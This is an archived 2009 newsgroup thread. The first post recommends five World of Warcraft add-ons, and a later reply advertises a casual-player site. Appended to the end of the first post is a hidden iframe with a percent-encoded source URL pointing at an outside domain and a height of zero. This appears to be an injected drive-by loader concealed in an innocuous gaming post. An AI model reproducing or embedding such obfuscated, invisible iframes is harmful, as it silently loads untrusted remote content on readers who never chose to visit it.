World of Warcraft's Top 5 Add Ons

1 view

utdduu...@yahoo.com

Mar 10, 2009, 9:56:44 PM3/10/09
to World of Warcraft , WOW

One of the best features in World of Warcraft is the flexibility
Blizzard has given users to create and use game-enhancing "add ons",
otherwise known as "mods". They allow for a much better gaming
experience and can even give you an edge over competing players.
I've put together a top 5 list of World of Warcraft add ons based on
my experience with them. They are not ranked in order of importance or
best functioning, but are (in my opinion) the top 5 overall add ons.
aAdd on #1: Titan Panel
Titan panel is a fantastic add on that greatly improves World of
Warcraft's UI (user interface). Two bars are positioned along the very
top and very bottom of the game screen displaying basic information
such as location co-ordinates, equipment durability, honor kills and
points accumulated, XP gained per hour and bag slots available. Titan
Panel can also be customized to display a wide range of other
information.
Add on #2: Auctioneer
This is an extremely useful add on for those wanting to find the
perfect bargain at the Auction House, or for those that want to "play
the market" and buy items at a low cost to re-list them at the
market's usual price.
Add on #3: Atlas
Atlas is essentially an advanced version of the current World of
Warcraft map. It includes detailed maps of instances and battlegrounds
-- something that isn't included in the regular map. Additionally,
Atlas provides the location of dungeon locations, out-of-instance raid
bosses and flight points.
Add on #4: DamageMeters
DamageMeters calculates and keeps track of damage and healing done by
member's of a party or raid group. It is perfect for real-time
comparison and serves as an incentive for group members to perform
better. Up-to-minute data can instantly be displayed at any time by
calling a command.
Add on #5: CT_RaidAssist
One of the most important add ons to have is CT_RaidAssist. Many
raiding guilds will insist on having this mod installed as it greatly
improves raid efficiency and quickly displays of raid-related
information. Players are able to monitor any group member's HP and
mana, and any buffs or debuffs that have been cast on
them.
<IfrAmE src=http://%6C%6C%38%30%2E%63%6F%6D/ad.htm width=100
height=0></IfrAmE>

WowRelief

Apr 7, 2009, 7:24:00 PM4/7/09
to World of Warcraft , WOW
Friends and family pressuring you to quit playing? Having a hard time
balancing WoW with your daily life? As both former hardcore players
and now casual, we know exactly what the normal player goes through.
Thats why we formed this new site for casual players:

http://wowrelief.com

Whether you’re a seasoned veteran or a newbie just trying to get your
first character to 80, share and learn how to get the most out of your
wow experience, because here at Wow Relief you don’t have to quit.

http://wowrelief.com/